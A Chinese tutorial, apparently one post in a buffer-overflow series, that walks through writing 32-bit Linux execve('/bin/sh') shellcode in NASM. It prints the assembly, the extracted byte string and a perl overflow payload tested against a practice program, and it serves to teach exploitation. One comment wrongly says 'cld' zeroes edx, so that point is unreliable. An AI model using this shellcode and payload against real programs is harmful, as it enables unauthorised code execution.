如何编写本地shellcode

好,我们正式开始一步步来编写shellcode,结合之前的示例程序,写个打开一个新shell的shellcode。


在写之前,先介绍编写shellcode的一些技巧,特别有用。


shellcode编写技巧

如何避免零字节

shellcode通常是由于strcpy/sprintf等字符串函数造成溢出,因此通过来注入的shellcode不能出现零字节。但实际运行的代码是需要0的,那如何处理呢?

使用xor指令对寄存器进行清零或者cld,如:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
cld     ; 该指令对edx进行清零

如果需要将eax的值赋为0x5,不能直接写成mov eax, 0x05,因为它会生成机器码mov eax, 0x00000005,会有0填充。可以采用下面这个技巧:

xor eax, eax
mov al, 0x05

X86架上对通用寄存器都提供对应的16位和8寄存,上述例子就是通过它来避免零出现。

如何知道绝对地址

尽管在前面的攻击例子中,shellcode存放的地址是已知道的,但不同的攻击中,它的地址是会变化的,那么我们如何编写shellcode不依赖了这个变化的地址而通用化呢? 那么需要借用一些相对跳转指令来获取绝对地址

call指令是相对转跳,但会在栈上压上绝对地址,然后再弹出就可以获取绝对地址,如:

jmp short get_string
code:
       pop eax            ; 这里弹出的是call指令压栈的下条指令的地址,即"hello world"字符串的地址

get_string:
      call code
data:
db 'hello world', 0x0a

push指令将数据压到栈上,然后获取esp的值,就是刚压栈数据的绝对地址,如:

push 0x4b435546   ; 0x46, 0x55, 0x43, 0x4b 分别 FUCK字符的 ascii码
mov eax, esp            ; 将"FUCK"字符串首地址赋给eax,后续可用于系统调用传参

Linux系统调用约定

Linux系统调用是以int 0x80指令来陷入内核态的,系统调用号通过eax来传递,参数分别是ebx, ecx, edx, edi, esi来传递。

编写shellcode


在Linux下编写shellcode,可以直接使用gcc对汇编.S文件进行编译链接,生成标准的可执行ELF文件,同时也能直接进行测试,但有一点不方便是的提取机器码很不方便。

为了方便用提取机器码,使用nasm编译器生成bin格文件,没有任何其它格式数据,方便直接提取。



我们要编写的本地shellcode,对应C 语言逻辑如下

char *argv[2];

argv[0] = "/bin/sh";
argv[1] = NULL;

execve("/bin/sh", argv, NULL);

翻译成汇编语言过程如下:

将"/bin/sh"字符串压到栈上,包含字符串结串符'\0'

xor edx, edx
push edx
push 0x68732f2f
push 0x6e69622f

将字符串/bin//sh压入栈内,同时通过push edx来保证字符串后面的数所据是0,也即字符串结束符。 请注意,栈是从高地址向低地址生长的,所以要从字符串尾巴压起。

mov ebx, esp

此时栈底就是字符中址的开始地址,该指令将字符串地址赋给ebx(系统调用的第一个参数)

将下来是将argv[2]数组的内容放到栈上。

push edx    ; 将argv[1](值为  NULL) 放到栈上
push ebx    ; 将argv[0]( "/bin//sh")放到栈上

此时esp指向的空间,刚才对应argv[2]数组结构的开始地址

由于argv是系统调用第二参数,需要将它赋给ecx

mov ecx, esp

xor eax, eax,
mov al, 0xb

到这时, eax 为 11(系统调用号),ebx为"/bin//sh"字符号(第一参数),ecx为argv数组(第二参数),edx为NULL(第三参数),那就可以直接使用int 0x80进行系统调用了。

int 0x80


将上述指令拼在一起就是如下的汇编代码:

BITS 32

xor edx, edx
push edx
push 0x68732f2f
push 0x6e69622f

mov ebx, esp

push edx
push ebx

mov ecx, esp

xor eax, eax
mov al, 0xb

int 0x80



编译生成机器码

nasm -o shell2 shell2.s

生成的shell2文件为bin数据,全是机器码,没有任何格式数据,使用Linux命令转换成bash或者perl可输入的shellcode.

$ od -t x1 shell2 | sed -e 's/[0-7]*//' | sed -e 's/ /\\x/g'
\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52
\x53\x89\xe1\x31\xc0\xb0\x0b\xcd

然后使用之前的stack1程序进行测试:

$ echo $$
2503
$ perl -e 'printf "A"x48 . "\x10\xd7\xff\xff" . "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"' > bad.txt;./stack1
data: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒1▒Rh//shh/bin▒▒RS▒▒1▒
                                                                              ̀▒▒▒
$ echo $$
4398

说明:echo $$命令输出当前shell(即bash或者sh)的pid

前后两次不一样,那就说明 shellcode执行后,打开了一个新shell。 也即shellcode运行成功,测试通过。

小结

本文介绍使用汇编语言编写shellcode的技巧,如零数值,绝对地址以及Linux系统调用约定。最后成功编写一个本地shellcode。

============= 回顾一下本系列文章 ==============
  • 缓冲区溢出攻击实践
  • 缓冲区溢出攻击原理分析
  • 初识shellcode
  • 如何编写本地shellcode
  • 编写shellcode测试工具
  • 使用ret2reg攻击绕过地址混淆
  • 使用ret2libc攻击方法绕过数据执行保护

如何编写本地shellcode_第1张图片

你可能感兴趣的:(攻击,shellcode,缓冲区溢出)